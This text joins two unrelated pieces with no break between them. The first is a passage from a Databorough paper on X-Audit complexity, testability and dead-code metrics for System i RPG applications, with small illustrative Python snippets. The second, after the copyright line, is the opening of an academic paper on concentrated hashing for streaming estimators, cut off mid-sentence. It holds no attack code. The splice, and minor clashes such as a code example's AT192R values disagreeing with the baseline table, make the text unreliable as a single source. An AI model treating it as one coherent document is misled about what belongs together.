
**Modified** - The object from the PTF library was found in one of the customized libraries. The PTF object will have to be reviewed, and changes applied in the customized library must be manually applied to the object in the PTF library.

**New** - The object from the PTF library was not found in the base repository. The PTF object can be placed in the base library.

**Apply** - The object from the PTF library was found in one of the base libraries but not in any of the customized libraries. Therefore the PTF object can overlay the object in the base library.

**Refers** - The object from the PTF library refers to one or more objects in one of the customized libraries. The PTF object will have to be analyzed to make sure all customized objects referred to still meet the requirements of this object.

**Referenced** - The object from the PTF library is referenced by an object in one of the customized libraries. The customized objects will have to be reviewed to make sure the PTF object will still interface properly to the customized objects.

**Testability and Metrics**

Testability is one of the characteristics of maintainability, which, again, is one of the ISO characteristics of software quality. Most metrics that pertain to complexity and maintainability also pertain to testability. If a program is more complex, and more difficult to maintain, it tends to be more difficult to test. With perhaps a few exceptions, pretty much all of the metrics in the section Overview: Translating Quality into Measurable Items impact a program's testability.
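Metrics like cyclomatic complexity are mechanical enough to sketch in a few lines. The following is an illustrative approximation only – the opcode list and comment handling are assumptions, and X-Audit's actual scanner is certainly more thorough – counting decision opcodes in free-form RPG-like source:

```python
import re

# Decision opcodes that each add a branch in free-form RPG-like source
# (illustrative subset, not a complete opcode list).
DECISION_TOKENS = re.compile(r"\b(IF|ELSEIF|WHEN|DOW|DOU|FOR|AND|OR)\b",
                             re.IGNORECASE)

def cyclomatic_complexity(source: str) -> int:
    """Approximate McCabe complexity: 1 + number of decision points."""
    decisions = 0
    for line in source.splitlines():
        code = line.split("//")[0]  # strip free-form line comments
        decisions += len(DECISION_TOKENS.findall(code))
    return 1 + decisions
```

Note that `\b` word boundaries keep `ENDIF` and `ENDDO` from matching `IF` or `DOW`; a production scanner would also have to handle fixed-format specs, `/COPY` members and continuation lines.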
**Improving Testability With Tools**

Reducing code complexity can bring some relief in terms of testability, but the use of tools is more likely to make a dramatic and immediate impact on testability.

**Managing Code Complexity for Testability – Control Flow**

The completeness of test plans is often measured in terms of coverage. There are several levels or dimensions of coverage to consider:

- **Function**, or subroutine coverage – measures whether every function or subroutine has been tested
- **Code**, or statement coverage – measures whether every line of code has been tested
- **Branch** coverage – measures whether every case for a condition has been tested, i.e., tested for both true and false
- **Loop** coverage – measures whether every case of loop processing has been tested, i.e. zero iterations, one iteration, many iterations
- **Path** coverage – measures whether every possible combination of branch coverage has been tested. Large programs can have huge numbers of paths through them. A program with a mere 20 IF, DO or WHEN statements can have over one million different paths through it (paths = \(2^n\)).

Removing redundant conditions, and organizing necessary conditions in the simplest possible way, help to minimize control flow complexity and thus minimize both the probability of defects and the required testing effort.

**Managing Code Complexity for Testability – Data Flow**

Also of concern for managing testability is the impact of code implementation on the complexity of data flow. This type of complexity can be measured in a few different ways:

Depth of transformation – A variable that is moved from an input file directly to an output file is said to have a transformation degree of 1. If it is first multiplied by 10, for example, the degree is then 2. The more that data is transformed, the more complex the test plans must be.
Dispersion, or span of modification – If the statements that modify a given variable are scattered around a program it will both be more likely to have defects and more likely to require more testing. If a given variable is set three times in the span of ten consecutive statements, that is much less likely to produce defects or testing challenges than if the variable is modified three times each in different subroutines separated by 1,000 lines of code.

By considering these data flow complexity factors when designing the program code, the ultimate testability and quality of the program can be increased.

**Using Tools To Improve Testability**

Tools can be of great assistance in the testing effort, bringing gains in both productivity and quality. Examples of tools are:

Complexity metrics – as this paper discusses, understanding the complexity metrics of a program to be tested helps in preparing both project plans and testing plans. See the use cases Improving Project Management Through Better Information and Finding Programs Most Likely To Produce Defects When Modified for more information.

Generation and validation of test plans – see the section immediately below for more information on this.

Tracking code and branch coverage – tools can be of great assistance in tracking whether all statements and conditions in a program have been tested.

**Generation and Validation of Test Plans**

A common method of developing a test plan is to follow a hierarchy as follows:

- Business Processes
- Test Cases
- Test Scenarios

In System i applications a given interactive program might typically be thought of at the test case level and have any number of individual test scenarios. A very useful approach to developing the test case and test scenarios is to translate the program into a UML Activity Diagram. This kind of diagram shows all the different use paths a user can follow in executing the program and provides an excellent foundation for the test scenarios.
(Note that these paths are not exactly the same thing as the code paths described above, though they are obviously related.) Shown below is an example of a portion of an activity diagram as produced by X-Analysis which can be used to improve testing productivity and quality.

In the above diagram from Databorough's X-Analysis UML feature, each connector would typically be designated as a test scenario, with conditions, data, actions and results defined for that function.

**Use Cases for Metrics Reporting and Difference Analysis**

**Find the Most Complex Code in My System**

**Why it's important and valuable**

There are three categories of reasons why this is valuable information:

1. Project planning – With complexity metrics you can make more fine-grained judgments about the strategy and planning of your projects. See the use case about improving project management for detailed information.
2. Proactive complexity mitigation – IT managers with a long term view of their system's health take proactive measures to prevent their code from becoming excessively complex. See the use case about extending the life and value of your system for more information on this perspective.
3. Design recovery and migration – If you are extracting business rules or migrating your code to another language you may want to plan on manual, corrective activity to deal with overly complex code.

**What information is needed and why**

In this use case example we will use either or both of the basic complexity reports that are pre-configured in X-Audit:

1. COMPLEXP – metrics by program, or
2. COMPLEXS – metrics by subroutine

Both of these reports have the same data except that the latter also has subroutine names, giving more detailed results.
Otherwise, both of these contain the same metrics:

- Number of actual lines of code
- Greatest number of source records in a subroutine
- Greatest number of statements in an IF/DO block
- Cyclomatic complexity
- Halstead volume
- Maintainability index
- Number of virtually global variables
- Total or average variable span by line number or subroutine
- Decision density
- Number of database files
- Number of called programs
- Greatest depth of nested IF/DOs
- Greatest depth of nested ELSEs
- Number of GOTOs or CABxxs
- Greatest depth of loops within loops

These reports both select all objects with an attribute of RPG or RPGLE.

A little bigger picture: X-Audit provides a number of metrics for evaluating complexity. There are three ways to think about measuring the complexity of your code:

1. Using traditional, cross-language metrics, such as Cyclomatic Complexity, Halstead Volume and Maintainability Index.
2. Using additional metrics provided by X-Audit that are more language and System i specific.
3. Using your own custom metrics:
   A) Computed by you using the provided X-Audit formula, which enables you to combine any of the above metrics.
   B) Writing your own code analysis programs and creating your own application-specific metrics using the X-Audit user exit program facility.

**Evolving the Most Representative Metrics**

Eventually you will want to decide on which metrics best represent complexity in your application. These might be one or more of the pre-packaged metrics or some combination of them that you perform your own customized computations on.

**How to generate the report**

Select either of the above reports and click on Run Metrics Report on the main X-Audit screen. If you want to modify either of these reports you can make a copy of it and change any of the parameters.
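The maintainability index in the list above is typically computed from Halstead volume, cyclomatic complexity and lines of code. The widely published form of the formula is shown below as a sketch; X-Audit's exact computation may differ:

```python
import math

def maintainability_index(halstead_volume: float,
                          cyclomatic: float,
                          loc: float) -> float:
    """Classic 171-point maintainability index (higher = more maintainable),
    in the commonly cited form that grew out of the HP-era research."""
    return (171
            - 5.2 * math.log(halstead_volume)   # natural log of Halstead volume
            - 0.23 * cyclomatic                 # cyclomatic complexity
            - 16.2 * math.log(loc))             # natural log of lines of code
```

Because the formula is logarithmic in volume and size, doubling a program's length costs far fewer index points than doubling its branching, which is one reason lines of code alone correlates poorly with maintainability.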
**Analyzing the Results**

The first time you see the results of this report you will realize how much measurable information you've been missing. You will want to play with the data in a number of ways to develop a model of which metrics give you the best indication of your own system's complexity. Here is an example of a screenshot for a shorter version of the above reports:

In this example all the metrics except Lines Of Code have been normalized to a scale of 1-100. Doing this helps read the results and also facilitates combining individual metrics into combined, weighted scores. Also in this example note that the first metric, "Base-Complex", is a custom, user-defined metric that is comprised of several other metrics that the user has decided most accurately convey complexity in this particular application. Note that this is sorted by Base-Complex, and note how Lines Of Code does not correlate well to complexity. This has been shown by many studies over the years – Lines of Code is a poor indicator of complexity.

**Reducing Size of Application and Maintenance Workload by Removing Unnecessary Code**

**Why it's important and valuable**

Many systems accumulate dead objects or dead code with little apparent harm. The key word there is "apparent". Many IT organizations waste an unknown number of hours maintaining, recompiling and testing objects that are no longer actually in use. Over a period of years the number of these objects tends to pile up, as does the amount of wasted effort.

**What information is needed and why**

In this use case example we will use either or both of the unused object reports that are pre-configured in X-Audit:

1. **UNUSEDOBJ** – unused objects, based on object description last used date
2. **UNUSEDCOD** – unused sections of code, e.g., subroutines or procedures not called

**How to generate the report**

Select either of the above reports and click on Run Metrics Report on the main X-Audit screen.
If you want to modify either of these reports you can make a copy of it and change any of the parameters. (See the section How the Product Works for more information on the screen options available to you.)

**Analyzing the Results**

The two reports work very differently and lead to different tasks you will want to undertake to reduce your maintenance workload.

UNUSEDOBJ – this report looks at the last used date from System i object description data. Be sure you understand exactly how the last used date is set and reset on the System i for objects before archiving them.

UNUSEDCOD – this report lists subroutines and procedures that have zero calls to them within their program. These represent sections of code that can be deleted. Be sure you follow good source management procedures, including archiving, before deleting code.

**Improve Project Management through Better Information**

**Why it's important and valuable**

With complexity metrics you can make more fine-grained judgments about the strategy and planning of your projects. Complexity information can help you:

a) Adjust programming estimates, and therefore schedules and costs
b) Decide where more thorough analysis is necessary
c) Decide which resources are most appropriate for a task
d) Develop more appropriate and detailed testing plans
e) Advise the business of additional project risks
f) Decide on alternative design plans to minimize changes to highly complex code

**What information is needed and why**

This use case utilizes your evolved complexity metrics – the ones that best represent complexity in your system.

**How to Apply Metrics to Project Management**

**Improving Estimates**

Research studies have shown that presenting information to programmers about the program they will be working on materially affects their estimates of the work to be done. By supplying some facts to supplement their intuition and experience-based judgment, you can obtain more realistic estimates of the amount of effort involved.
Examples of information that can improve the quality of estimates include:

- Number of calls to a subroutine to be changed
- Number of calls made by a subroutine
- Number of uses in a program of a variable to be changed
- Number of uses in a program of a file to be changed
- Cyclomatic complexity or other IF/DO metrics of code to be changed
- Number of files, input formats and/or subfiles in a program
- Number of statements in relevant programs, subroutines, or large IF/DO blocks to be changed

**Decide Where More Thorough Analysis is Necessary**

By understanding the complexity structure of a given program requiring modification, a manager can be sure a programmer has delivered a quality estimate by understanding which subroutines require changes and then comparing the programming estimates against the complexity metrics for those subroutines. If the values of certain variables in the program will be affected then the manager can also examine how many uses of the variables exist in the program, thus understanding the potential impact of the changes, and the amount of impact analysis required to do a quality job.

For example, there is a large difference in the amount of analysis work required between adding a few lines of code to a simple section of the mainline that does not affect variables, and adding a few lines of code located in the middle of deeply nested IF/DO/ELSE blocks in a subroutine called from many places in the program, where those changes affect variables widely used throughout the program.

Without doing the code research themselves, managers have had few options for evaluating the estimates provided by programmers. By simply asking programmers which subroutines they will be modifying, the manager can now evaluate the complexity metrics of those code sections and make a more informed judgment of whether the programmer's estimate is sufficiently considered.
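As a toy illustration of folding such facts into an estimate, the sketch below scales a base estimate by complexity risk factors. The function, thresholds and weights are entirely hypothetical and would need calibration against your own project history:

```python
def adjusted_estimate(base_hours: float,
                      cyclomatic: int,
                      variable_uses: int) -> float:
    """Scale a programmer's base estimate by complexity risk factors.
    The thresholds and weights here are illustrative placeholders."""
    factor = 1.0
    if cyclomatic > 50:        # deeply branched code: more analysis and testing
        factor += 0.5
    if variable_uses > 100:    # widely used variables: more impact analysis
        factor += 0.3
    return base_hours * factor
```

The value of such a rule is less the specific numbers than the discipline: the same metric moves the estimate the same way on every project, which is exactly the consistency the manual evaluation described above is reaching for.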
**Decide Which Resources Are Most Suitable For a Task**

For a given project, once the list of programs to be modified has been compiled, the IT manager can look at the metrics for the programs and decide which ones require the use of resources with either special program knowledge or the ability to handle highly complex programs. While most IT managers know this to some degree from experience, the availability of metrics presents the basis for a more quantifiable and consistent decision process.

**Develop More Detailed and Appropriate Testing Plans**

By understanding which subroutines are to be modified, and what their complexity metrics are, the project plan can be adjusted to account for additional testing for more complex sections of code being changed. Useful metrics include all of the cyclomatic and IF/DO complexity metrics, as well as metrics relating to numbers of files and fields involved.

**Advise the Business of Additional Project Risks**

Complexity metrics represent tangible information that IT can present to the business when explaining the challenges of particular projects. The metrics can be used to explain why some tasks require more time than others, and why some tasks are more likely to result in production defects. By making complexity metrics a regular part of project plans presented to business stakeholders, IT can shape the overall process to be based more on facts than on intuition and persuasion.

**Decide on Alternative Design Plans to Minimize Changes to Highly Complex Code**

For a given project, once the list of programs to be modified has been compiled, the IT manager can look at the metrics for the programs being changed and decide to investigate alternative design plans that might circumvent the most complex sections of code being changed. Obviously, all projects have more chance of success if they deal with the simplest possible code.
**Cleaning Up Your System to Recompile in its Entirety**

**Why it's important and valuable**

Why this is important almost goes without saying, but it often becomes one of those things that is important but not urgent. What can make it more urgent is if you plan on doing something like any of the following:

- Install a new release of packaged software
- Re-engineer or migrate your system
- Execute a large application enhancement project

**What information is needed and why**

There are a number of "alert" type metrics provided with X-Audit that are useful for this purpose. Some of them directly indicate that it is impossible to compile your system accurately; others indicate generally undesirable conditions that are worth investigating.

- No source for existing object
- Source was changed after object was created
- No object for existing source
- Logical file is duplicate of another
- Logical file is not used in any programs
- File has no members
- File is internally described
- File format level used in program does not match database file
- Program has hard coded libraries

**How to generate the report**

This is a pre-configured report provided with X-Audit – see the category, Source/Object Reports.

**Targeting the Top 1% of Code that Makes Your Job Difficult**

**Why it's important and valuable**

Numerous software studies have shown that the majority of defects come from a small percentage of programs, the majority of complexity in a system is contained in a small percentage of programs, maintenance tasks tend to revolve around a small percentage of programs, and so on. The Pareto Principle, a.k.a. the 80-20 rule, doesn't quite apply; it's more like the 90-10 rule, or the 95-5 rule, or, as the title suggests, even the 99-1 rule.
Here's a formula worth considering:

\[(\text{most complex code}) \cap (\text{most frequently changed code}) \rightarrow (\text{most troublesome, costly code})\]

In other words, the intersection of your most complex code and your most volatile code deserves some serious attention! What is it that makes code both complex and volatile?

- Defect repair leads to changes
- Hard coding leads to changes
- Inadequate design vs. business or technical needs leads to changes
- Changes lead to ever increasing complexity
- Complexity leads to defects

And so on. Yes, there can be a vicious cycle at work. If you can identify your most complex, volatile code, what can you do about it?

- Remove hard coding.
- Revisit other design aspects and see if the design needs to be upgraded.
- Hold managed code walkthroughs to inspect it for defects – various studies have put the cost of user-discovered defects at 10-100 times higher than developer-discovered defects.
- Refactor the section of code to simplify it; possibly break it into smaller, more manageable and more testable pieces.

**What information is needed and why**

The first use case, How Can I Find the Most Complex Code In My System, showed you how to do just that. What is needed for this use case is to combine that information with information about what source code is changed and how frequently.

**How to generate the report**

Depending on what you have done regarding defining which metrics you want to use for complexity analysis, you may be able to simply add the X-Audit metric SRCCHG360 to your metrics report. Alternatively you can run the report Source Change Volatility under the category Source/Object Reports and export all results to spreadsheets where you merge and analyze the complexity and volatility metrics results. X-Audit source volatility analysis works by analyzing source change dates in source files. This provides limited information.
X-Audit also provides an interface for more detailed source change data that can be fed from your change management system.

**Finding Programs Most Likely to Produce Defects when Modified**

**Why it's important and valuable**

Knowing which programs are the most likely to produce defects when modified can help you:

- Seek alternative design solutions that avoid those programs
- Adjust your programmer resource plan to place your most reliable programmers on those challenging programs
- Allow for additional time and resources in project plans for more extensive testing
- Alert business users to increased project risks
- Decide to proactively refactor/redesign your programs

**What information is needed and why**

Most of the complexity metrics have some bearing on how likely it is that modifications will lead to defects for a given program, but certain metrics are generally more useful than others, in particular, those that relate to the difficulty of impact analysis, or indicate program volatility:

- Number of virtually global variables
- Total or average variable span by line number or subroutine
- Decision density
- Greatest depth of IF/DO/ELSE blocks, or GOTO count
- Depth of subroutine calls
- Number of called programs or external procedures
- Number of statements changed in the last year

**How to generate the report**

This is a pre-configured report provided with X-Audit. Under the category, RPG Complexity Reports, select and run the report, Defect-prone programs.

**Analyzing the Results**

By developing a practice of tracking defects and measuring them against these defect analysis metrics, or others that you develop over time, you can refine your ability to predict defect levels and plan accordingly.
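One of the metrics above, variable span, is simple to state precisely. A sketch follows (illustrative only; not necessarily how X-Audit computes it): the span by line number is the distance between the first and last statements that set the variable.

```python
def variable_span(set_at_lines: list[int]) -> int:
    """Span by line number: distance between the first and last
    statements that set a variable; 0 if it is set in at most
    one place."""
    if not set_at_lines:
        return 0
    return max(set_at_lines) - min(set_at_lines)
```

A variable set three times within ten consecutive statements scores 9 or less; one set in subroutines a thousand lines apart scores in the thousands, flagging exactly the impact-analysis difficulty this use case is concerned with.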
---

**Identifying Unseen Risk in your Application**

**Why it's important and valuable**

This topic divides into two categories of risks:

- Object level risks, related to system object management
- Code level risks, related to the code of programs

The reason why identifying risks is important is self-evident. Quantifying the potential costs of the risks is also important, more so for weighing the cost of the repair effort than for doing the analysis, which is as simple as running the report mentioned below.

**What information is needed and why**

There are many potential risk factors in a system; here are a few to consider:

- Programs have non-approved hard coded libraries
- No source code exists for an object
- The source code has been changed since the object was created
- The same field name is found in multiple files in a program
- RPG UPDATE operations are done without listing fields
- RPG WRITE operations exist for input/update files and no CLEAR operation is found

**How to generate the report**

This is a pre-configured report provided with X-Audit. Under the category, Source/Object Reports, select and run the report, Unseen Risks.

---

**Monitoring Changes in Program Complexity to Preserve System Value & Extend its Life**

**Why it's important and valuable**

The second law of software evolution states, "as a system evolves, its complexity increases unless steps are taken to reduce it." Or, as someone else said, "the act of maintaining software necessarily degrades it." Your applications are an asset of your business. As you maintain them over time you cause the value to depreciate by making them more complex and less maintainable. Arguably you are also increasing their value by adding functionality, but there is no doubt that applications become more time-consuming and costly to maintain as they age.
Some IT organizations address this growing complexity by proactively maintaining maintainability. After establishing a set of metrics that best represents complexity for their applications, they periodically measure the complexity of the entire system. Programs that either cross a threshold of complexity or show large increases in complexity are candidates for refactoring.

**What information is needed and why**

This process is based on the set of metrics established in the first use case, *How Can I Find the Most Complex Code In My System?* Armed with that information, there are two basic approaches:

- Refactor programs that cross a certain threshold of complexity
- Refactor programs that have shown a large increase in complexity and are expected to continue to do so

The following diagram depicts the growth in complexity of a particular program and shows that when it crossed a defined threshold of complexity it was refactored to preserve its maintainability:

It is useful to store metrics in order to compare them to future values of the metrics. As the chart shows, analyzing the differences can reveal important patterns of complexity as it relates to overall analyzability, changeability, stability and testability. This information should also be reviewed with information about past program volatility and known plans for future projects.
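The two approaches above amount to a simple decision rule over stored metric snapshots. The following Python sketch illustrates it; the threshold values, function name and dictionary layout are illustrative assumptions, not X-Audit's actual schema:

```python
# Illustrative sketch (not X-Audit's schema): flag refactoring candidates
# from two complexity snapshots, using both decision rules from the text.
THRESHOLD = 80      # assumed absolute complexity threshold
GROWTH_LIMIT = 8    # assumed per-period increase suggesting a trend

def refactor_candidates(previous, current):
    """previous/current: dict mapping program name -> base complexity score."""
    candidates = []
    for prog, score in current.items():
        growth = score - previous.get(prog, score)
        if score >= THRESHOLD or growth >= GROWTH_LIMIT:
            candidates.append((prog, score, growth))
    return sorted(candidates, key=lambda c: -c[1])  # most complex first

# Example with scores in the spirit of the sample reports:
print(refactor_candidates({"AT192R": 73, "AT110R": 21},
                          {"AT192R": 83, "AT110R": 24}))
```

A program is flagged either for its absolute score or for its growth between snapshots, matching the two refactoring triggers described above.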
**Analyzing Metrics Time Series Data for Changes in System Complexity**

**Why it’s important and valuable**

There are at least two good examples of the benefits available by examining changes in complexity metrics over a period of time:

- Patterns in complexity growth and system growth that are obscured in the hurry of day-to-day work can be seen, and future development plans can be adjusted or created based on the new understandings
- Observed increases in complexity that do not match expectations can reveal poor design or programming practices, which in turn may lead to corrections, better training or adjustments in future resource assignments

**What information is needed and why**

Obtaining this time series information is simply a matter of storing metrics at different points in time, calculating the differences and reporting on them. This is best done when an organization has identified the specific metrics that give the best indication of complexity and maintainability for the application.

Here is an example of a baseline metrics report at a given point in time. In this case a baseline complexity metric has been customized by the user and the report is sorted top to bottom in that sequence. Also, all metrics scores have been normalized to a scale of 1-100.
<table>
<thead>
<tr><th>Obj</th><th>BaseComplex</th><th>MaintIdx</th><th>DecDensity</th><th>VarSpan</th><th>LOC</th></tr>
</thead>
<tbody>
<tr><td>AT201R2</td><td>94</td><td>94</td><td>100</td><td>109</td><td>3,384</td></tr>
<tr><td>AT144R</td><td>88</td><td>83</td><td>77</td><td>86</td><td>3,784</td></tr>
<tr><td>AT200R</td><td>88</td><td>85</td><td>92</td><td>96</td><td>5,984</td></tr>
<tr><td>AT198R</td><td>84</td><td>85</td><td>79</td><td>78</td><td>6,720</td></tr>
<tr><td>AT192R</td><td>83</td><td>93</td><td>91</td><td>82</td><td>6,142</td></tr>
<tr><td>AT156R</td><td>71</td><td>81</td><td>80</td><td>72</td><td>4,899</td></tr>
<tr><td>AT201R</td><td>56</td><td>46</td><td>52</td><td>56</td><td>3,024</td></tr>
<tr><td>AT110R</td><td>24</td><td>17</td><td>17</td><td>21</td><td>664</td></tr>
<tr><td>AT178R</td><td>23</td><td>19</td><td>12</td><td>4</td><td>255</td></tr>
<tr><td>AT112R</td><td>15</td><td>5</td><td>13</td><td>21</td><td>340</td></tr>
</tbody>
</table>

At a later point in time we run the analysis again and get a similar set of results, but the metrics are now different. The following report shows which metrics have changed and by how much. A positive number indicates the metric value has increased.
**Time Series Report Showing Changes In Metrics**

<table>
<thead>
<tr><th>Obj</th><th>BaseComplex</th><th>MaintIdx</th><th>DecDensity</th><th>VarSpan</th><th>LOC</th></tr>
</thead>
<tbody>
<tr><td>AT192R</td><td>10</td><td>-3</td><td>1</td><td>-1</td><td>403</td></tr>
<tr><td>AT156R</td><td>9</td><td>-1</td><td>9</td><td>0</td><td>364</td></tr>
<tr><td>AT201R</td><td>9</td><td>-4</td><td>3</td><td>3</td><td>241</td></tr>
<tr><td>AT201R2</td><td>7</td><td>-5</td><td>2</td><td>2</td><td>176</td></tr>
<tr><td>AT200R</td><td>7</td><td>-3</td><td>1</td><td>6</td><td>228</td></tr>
<tr><td>AT198R</td><td>5</td><td>-1</td><td>5</td><td>7</td><td>-273</td></tr>
<tr><td>AT110R</td><td>3</td><td>0</td><td>-1</td><td>3</td><td>-36</td></tr>
<tr><td>AT112R</td><td>3</td><td>3</td><td>8</td><td>0</td><td>26</td></tr>
<tr><td>AT178R</td><td>1</td><td>0</td><td>7</td><td>5</td><td>48</td></tr>
<tr><td>AT144R</td><td>-1</td><td>4</td><td>6</td><td>0</td><td>106</td></tr>
</tbody>
</table>

In this example the program with the largest increase in the base complexity metric is listed first, showing an increase of 10. Correspondingly its maintainability has dropped by 3 and its line count has increased by 403. What also stands out for the IT manager is that program AT201R has had a substantial increase in base complexity of 9, yet the IT manager knows that he had only asked for a simple change to this program; that is worth investigating.
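A delta report like the one above can be produced with a small script once metric snapshots are stored. This Python sketch computes per-program metric differences and sorts by the change in base complexity; the column names follow the sample reports, while the dictionary-based layout is an assumption for illustration:

```python
# Illustrative sketch: compute per-program metric deltas between two stored
# snapshots and sort by the change in the base complexity metric, largest
# increase first.
def metric_deltas(baseline, later):
    """baseline/later: dict of program -> dict of metric name -> value."""
    rows = []
    for prog, metrics in later.items():
        base = baseline.get(prog, {})
        delta = {m: v - base.get(m, v) for m, v in metrics.items()}
        rows.append((prog, delta))
    return sorted(rows, key=lambda r: -r[1].get("BaseComplex", 0))

# Example values taken from the two sample reports above:
baseline = {"AT192R": {"BaseComplex": 73, "LOC": 5739},
            "AT144R": {"BaseComplex": 89, "LOC": 3678}}
later    = {"AT192R": {"BaseComplex": 83, "LOC": 6142},
            "AT144R": {"BaseComplex": 88, "LOC": 3784}}
for prog, d in metric_deltas(baseline, later):
    print(prog, d["BaseComplex"], d["LOC"])
```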
**Analyzing Differences in Source Code and System Objects in different Versions** **Why it's important and valuable** There are a number of circumstances where it is useful to compare different versions of an application: - A software vendor delivers a new release of the application and you need to know what has changed so you can confirm your customizations or interfaces will work correctly - You operate with different versions of the software in different countries or for different subsidiaries or divisions and you need to understand the differences when planning for a new project - You need to compare a snapshot of the application from the past with the current version in order to track down system changes that are causing problems - A slightly different situation is when you have a packaged application for which you have made customizations and the vendor delivers a new release and you need to assess the impact of the new release on your customizations. **What information is needed and why** Performing an analysis for any of these circumstances involves comparing a large set of system and source code information. 
At a high level you might investigate some of these types of information for differences between the versions:

- Commands
  - Parameters
  - Command processing and validity checking programs called
- Database
  - Fields
  - Keys
  - Relationships
  - Logical files over each physical file
  - Constraints
  - Triggers
  - Select/omit criteria
- Programs
  - Business rules
  - Bound modules
  - Program references
  - Subroutines
- Bound service programs
  - Procedures
  - SQL queries
- Source code
  - Individual statements added, changed or deleted

Obviously this is a lot of information and accomplishing this task involves these primary capabilities:

- Collecting and storing this information for two versions
  - For the fourth case listed in the top section you actually need to triangulate between three versions of the source and objects: the original base package, your customizations, and the new version of the base package
- Analyzing the data and reporting on the differences.

Databorough's X-Audit product provides the functionality to do these kinds of analysis.

Steve Kilner
© Databorough
**No Repetition: Fast Streaming with Highly Concentrated Hashing**

Anders Aamand* Debarati Das* Evangelos Kipouridis* Jakob B. T. Knudsen* Peter M. R. Rasmussen* Mikkel Thorup*

April 3, 2020

**Abstract**

To get estimators that work within a certain error bound with high probability, a common strategy is to design one that works with constant probability, and then boost the probability using independent repetitions. Important examples of this approach are small space algorithms for estimating the number of distinct elements in a stream, or estimating the set similarity between large sets. Using standard strongly universal hashing to process each element, we get a sketch based estimator where the probability of a too large error is, say, 1/4. By performing \( r \) independent repetitions and taking the median of the estimators, the error probability falls exponentially in \( r \). However, running \( r \) independent experiments increases the processing time by a factor \( r \).

Here we make the point that if we have a hash function with strong concentration bounds, then we get the same high probability bounds without any need for repetitions. Instead of \( r \) independent sketches, we have a single sketch that is \( r \) times bigger, so the total space is the same. However, we only apply a single hash function, so we save a factor \( r \) in time, and the overall algorithms just get simpler. Fast practical hash functions with strong concentration bounds were recently proposed by Aamand et al. (to appear in STOC 2020).
Using their hashing schemes, the algorithms thus become very fast and practical, suitable for online processing of high volume data streams.

*Basic Algorithms Research Copenhagen (BARC), University of Copenhagen.

### 1 Introduction

To get estimators that work within a certain error bound with high probability, a common strategy is to design one that works with constant probability, and then boost the probability using independent repetitions. A classic example of this approach is the algorithm of Bar-Yossef et al. [3] to estimate the number of distinct elements in a stream. Using standard strongly universal hashing to process each element, we get an estimator where the probability of a too large error is, say, 1/4. By performing $r$ independent repetitions and taking the median of the estimators, the error probability falls exponentially in $r$. However, running $r$ independent experiments increases the processing time by a factor $r$.

Here we make the point that if we have a hash function with strong concentration bounds, then we get the same high probability bounds without any need for repetitions. Instead of $r$ independent sketches, we have a single sketch that is $\Theta(r)$ times bigger, so the total space is essentially the same. However, we only apply a single hash function, processing each element in constant time regardless of $r$, and the overall algorithms just get simpler. Fast practical hash functions with strong concentration bounds were recently proposed by Aamand et al. [1]. Using their hashing schemes, we get a very fast implementation of the above streaming algorithm, suitable for online processing of high volume data streams.

To illustrate a streaming scenario where the constant in the processing time is critical, consider the Internet. Suppose we want to process packets passing through a high-end Internet router. Each application only gets very limited time to look at the packet before it is forwarded.
If it is not done in time, the information is lost. Since processors and routers use some of the same technology, we never expect to have more than a few instructions available. Slowing down the Internet is typically not an option. The papers of Krishnamurthy et al. [19] and Thorup and Zhang [25] explain in more detail how high speed hashing is necessary for their Internet traffic analysis. Incidentally, the hash function we use from [1] is a bit faster than the ones from [19, 25], which do not provide Chernoff-style concentration bounds.

The idea is generic and can be applied to other algorithms. We will also apply it to Broder’s original min-hash algorithm [7] to estimate set similarity, which can now be implemented efficiently, giving the desired estimates with high probability.

**Concentration** Let us now be more specific about the algorithmic context. We have a key universe $U$, e.g., 64-bit keys, and a random hash function $h$ mapping $U$ uniformly into $R = (0, 1]$. For some input set $S$ and some fraction $p \in (0, 1)$, we want to know the number $X$ of keys from $S$ that hash below $p$. Here $p$ could be an unknown function of $S$, but $p$ should be independent of the random hash function $h$. Then the mean $\mu$ is $\mathbb{E}[X] = |S|p$. If the hash function $h$ is fully random, we get the classic Chernoff bounds on $X$ (see, e.g., [20]):

$$\Pr[X \geq (1 + \varepsilon)\mu] \leq \exp(-\varepsilon^2\mu/3) \text{ for } 0 \leq \varepsilon \leq 1, \quad (1)$$

$$\Pr[X \leq (1 - \varepsilon)\mu] \leq \exp(-\varepsilon^2\mu/2) \text{ for } 0 \leq \varepsilon \leq 1. \quad (2)$$

Unfortunately, we cannot implement fully random hash functions as it requires space as big as the universe. To get something implementable in practice, Wegman and Carter [26] proposed strongly universal hashing. The random hash function $h : U \rightarrow R$ is strongly universal if for any given distinct keys $x, y \in U$, $(h(x), h(y))$ is uniform in $R^2$.
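The classic multiply-mod-prime construction (spelled out in the next paragraph) gives such a strongly universal map. A minimal Python sketch, where the specific Mersenne prime is an illustrative choice:

```python
import random

# Sketch of a strongly universal hash into [0,1): h(x) = ((a*x + b) mod P)/P
# with P a prime larger than the key universe and a, b uniform in Z_P.
# The specific prime is an illustrative choice, not mandated by the text.
P = (1 << 61) - 1          # Mersenne prime, comfortably above 32-bit keys
a = random.randrange(P)
b = random.randrange(P)

def h(x):
    """Map a key 0 <= x < P to a fraction in [0, 1)."""
    return ((a * x + b) % P) / P
```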
The standard implementation of a strongly universal hash function into $[0,1)$ is to pick a large prime $\varphi$ and two uniformly random numbers $a, b \in \mathbb{Z}_\varphi$. Then $h_{a,b}(x) = ((ax + b) \mod \varphi)/\varphi$ is strongly universal from $U \subseteq \mathbb{Z}_\varphi$ to $R = \{i/\varphi \mid i \in \mathbb{Z}_\varphi\} \subset [0, 1)$. Obviously it is not uniform in $[0,1)$, but for any $p \in [0,1)$, we have $\Pr[h(x) < p] \approx p$, with equality if $p \in R$. Below we ignore this deviation from uniformity in $[0,1)$.

Assuming we have a strongly universal hash function $h : U \rightarrow [0,1)$, we again let $X$ be the number of elements from $S$ that hash below $p$. Then $\mu = \mathbb{E}[X] = |S|p$, and because the hash values are 2-independent, we have $\text{Var}[X] \leq \mathbb{E}[X] = \mu$. Therefore, by Chebyshev’s inequality,

$$\Pr[|X - \mu| \geq \varepsilon\mu] < 1/(\varepsilon^2\mu).$$

As $\varepsilon^2 \mu$ gets large, we see that the concentration we get with strongly universal hashing is much weaker than the Chernoff bounds with fully random hashing. However, Chebyshev is fine if we just aim at a constant error probability like 1/4, and then we can use the median over independent repetitions to reduce the error probability. In this paper we discuss benefits of having hash functions with strong concentration akin to that of fully random hashing:

